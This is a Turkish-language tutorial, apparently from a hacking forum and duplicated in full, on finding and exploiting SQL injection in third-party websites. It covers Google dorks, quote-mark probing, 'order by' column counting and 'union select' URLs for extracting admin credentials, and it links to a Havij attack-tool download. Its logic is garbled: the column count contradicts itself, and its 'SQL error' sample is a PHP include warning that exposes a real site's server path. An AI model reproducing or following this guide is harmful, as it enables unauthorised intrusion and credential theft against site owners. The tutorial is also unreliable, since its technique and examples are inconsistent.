SQL NEDİR
* SQL (Structured Query Language) veritabanından bilgi çekme silme vb. gibi işlemler yapabilen bir dildir.
* SQL en yaygın olan güvenlik açığıdır
SQL Injection Nedir
* SQL İnjection bir SQL açıklı siteye uygulanan İnjection türüdür.
SQL DİLİ KULLANAN VERİTABANLARI
Sybase
MySQL (EN SIK KULLANILAN VERİ TABANIDIR)
Mssql
PostgreSQL
Microsoft SQL Server
Oracle
Firebird
Access
SQL İnjection Olan Sayfayı Nasıl Bulabilirim ?
* Acunetix ve benzeri web site taratan programlarla hedefsiteki sql açığı bulabiliriz veya manuel olarak arayabiliriz
* Benim tavsiyem ''MANUEL OLARAK YAPILAN TARAMA EN GARANTİ TARAMA ŞEKİLİDİR DOĞRU YAPARSANIZ HACKLEMEK KESİNDİR ''
* SQL açığı olan bir sayfa bulabilmemiz için dork gerekmekte , kendiniz dork yazabilirsiniz
* Yada googleden rahatlıkla 'sql dorkları' diye aratarak bulabilrisniz
SQL Açığını kullanabilmemiz için sayfa url'sinde değişken değer olması lazım,
Örnek verelim ' www.hedefsite.com/index.php?pgId=15 ' ( index.php?pgI= ) örnek dorktur
* Google'den dorklarımızı arattık ve bulalım
* URL’nin sonunda php?id=45 veya daha farklı bir sayı yazar bu sayıların sonuna tırnak işareti (') koyuyoruz.
* Örnek: www.hedefsite.com/php?id=120 site bu sitede id değerimiz gördüğünüz gibi 120 id değerinin sonuna ’ işaretimizi koyuyoruz ve Enterlıyoruz.
www.hedefsite.com/php?id=120'
~~~ BURAYA DİKKAT ~~~ SİTE BİR HATA VERİRSE
ÖRNEK : Warning: include(../inc/content220\\\\\\\\\\\\\\\\’.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162
Warning: include() [function.include]: Failed opening ’../inc/content220\\\\\\\\\\\\\\\\’.inc.php’ for inclusion (include_path=’.:/usr/lib/php5’) in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162
BU VEYA BUNUN GİBİ HATALAR ALIRSAK SİTEDE SQL AÇIĞI MEVCUTTUR
SQL Açığını Nasıl Kullanabiliriz ?
1. Havij ve benzeri programlar ile <a href="http://bilisimturkiye.bi.funpic.org/?p=196">HAVİJ SQL INJECTION ANLATIM VE HAVİJ İNDİR</a>
2. Manuel olarak
MANUEL OLARAK
ARKADAŞLAR İLK ÖNCE SİTEMİZDE KOLON SAYISINI BULMAMIZ GEREKİYOR BUNUN İÇİN İSE '' ordey+by+ veya group+by+ '' komutunu kullanıcaz
www.hedefsite.com/php?id=120+order+by+200 '' 200 SAYISINI ÖRNEK OLARAK VERİYORUM ''
BU SAYIYI GİTTİKÇE AZALTARAK DENİCEZ , HATA GİDENE KADAR
www.örneksite.com/php?id=120+order+by+150
www.örneksite.com/php?id=120+order+by+85
www.örneksite.com/php?id=120+order+by+40
www.örneksite.com/php?id=120+order+by+7 DİYELİMKİ 7 DA HATA GİTTİ YANİ KOLON SAYIMIZ 40'DIR
ŞİMDİ KOLONLARI EKRANA YANSITICAZ BUNUN İÇİNDE BUNUN İÇİN union+select+... kodumuzu kullanacağız. KOLON SAYIMIZ 40 DI ÖRNEK
http://www.hedefsite.com/php?id=120+...+0,1,2,3,4,5,6, YAZIYORUZ KOLON SAYIMIZ 7 OLDUĞU İÇİN KIRKA KADAR YAZALIM
VE GELEN KOLONLARDAN ADMİN BİLGİLERİNE ULAŞIYORUZ
* SQL (Structured Query Language) veritabanından bilgi çekme silme vb. gibi işlemler yapabilen bir dildir.
* SQL en yaygın olan güvenlik açığıdır
SQL Injection Nedir
* SQL İnjection bir SQL açıklı siteye uygulanan İnjection türüdür.
SQL DİLİ KULLANAN VERİTABANLARI
Sybase
MySQL (EN SIK KULLANILAN VERİ TABANIDIR)
Mssql
PostgreSQL
Microsoft SQL Server
Oracle
Firebird
Access
SQL İnjection Olan Sayfayı Nasıl Bulabilirim ?
* Acunetix ve benzeri web site taratan programlarla hedefsiteki sql açığı bulabiliriz veya manuel olarak arayabiliriz
* Benim tavsiyem ''MANUEL OLARAK YAPILAN TARAMA EN GARANTİ TARAMA ŞEKİLİDİR DOĞRU YAPARSANIZ HACKLEMEK KESİNDİR ''
* SQL açığı olan bir sayfa bulabilmemiz için dork gerekmekte , kendiniz dork yazabilirsiniz
* Yada googleden rahatlıkla 'sql dorkları' diye aratarak bulabilrisniz
SQL Açığını kullanabilmemiz için sayfa url'sinde değişken değer olması lazım,
Örnek verelim ' www.hedefsite.com/index.php?pgId=15 ' ( index.php?pgI= ) örnek dorktur
* Google'den dorklarımızı arattık ve bulalım
* URL’nin sonunda php?id=45 veya daha farklı bir sayı yazar bu sayıların sonuna tırnak işareti (') koyuyoruz.
* Örnek: www.hedefsite.com/php?id=120 site bu sitede id değerimiz gördüğünüz gibi 120 id değerinin sonuna ’ işaretimizi koyuyoruz ve Enterlıyoruz.
www.hedefsite.com/php?id=120'
~~~ BURAYA DİKKAT ~~~ SİTE BİR HATA VERİRSE
ÖRNEK : Warning: include(../inc/content220\\\\\\\\\\\\\\\\’.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162
Warning: include() [function.include]: Failed opening ’../inc/content220\\\\\\\\\\\\\\\\’.inc.php’ for inclusion (include_path=’.:/usr/lib/php5’) in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162
BU VEYA BUNUN GİBİ HATALAR ALIRSAK SİTEDE SQL AÇIĞI MEVCUTTUR
SQL Açığını Nasıl Kullanabiliriz ?
1. Havij ve benzeri programlar ile <a href="http://bilisimturkiye.bi.funpic.org/?p=196">HAVİJ SQL INJECTION ANLATIM VE HAVİJ İNDİR</a>
2. Manuel olarak
MANUEL OLARAK
ARKADAŞLAR İLK ÖNCE SİTEMİZDE KOLON SAYISINI BULMAMIZ GEREKİYOR BUNUN İÇİN İSE '' ordey+by+ veya group+by+ '' komutunu kullanıcaz
www.hedefsite.com/php?id=120+order+by+200 '' 200 SAYISINI ÖRNEK OLARAK VERİYORUM ''
BU SAYIYI GİTTİKÇE AZALTARAK DENİCEZ , HATA GİDENE KADAR
www.örneksite.com/php?id=120+order+by+150
www.örneksite.com/php?id=120+order+by+85
www.örneksite.com/php?id=120+order+by+40
www.örneksite.com/php?id=120+order+by+7 DİYELİMKİ 7 DA HATA GİTTİ YANİ KOLON SAYIMIZ 40'DIR
ŞİMDİ KOLONLARI EKRANA YANSITICAZ BUNUN İÇİNDE BUNUN İÇİN union+select+... kodumuzu kullanacağız. KOLON SAYIMIZ 40 DI ÖRNEK
http://www.hedefsite.com/php?id=120+...+0,1,2,3,4,5,6, YAZIYORUZ KOLON SAYIMIZ 7 OLDUĞU İÇİN KIRKA KADAR YAZALIM
VE GELEN KOLONLARDAN ADMİN BİLGİLERİNE ULAŞIYORUZ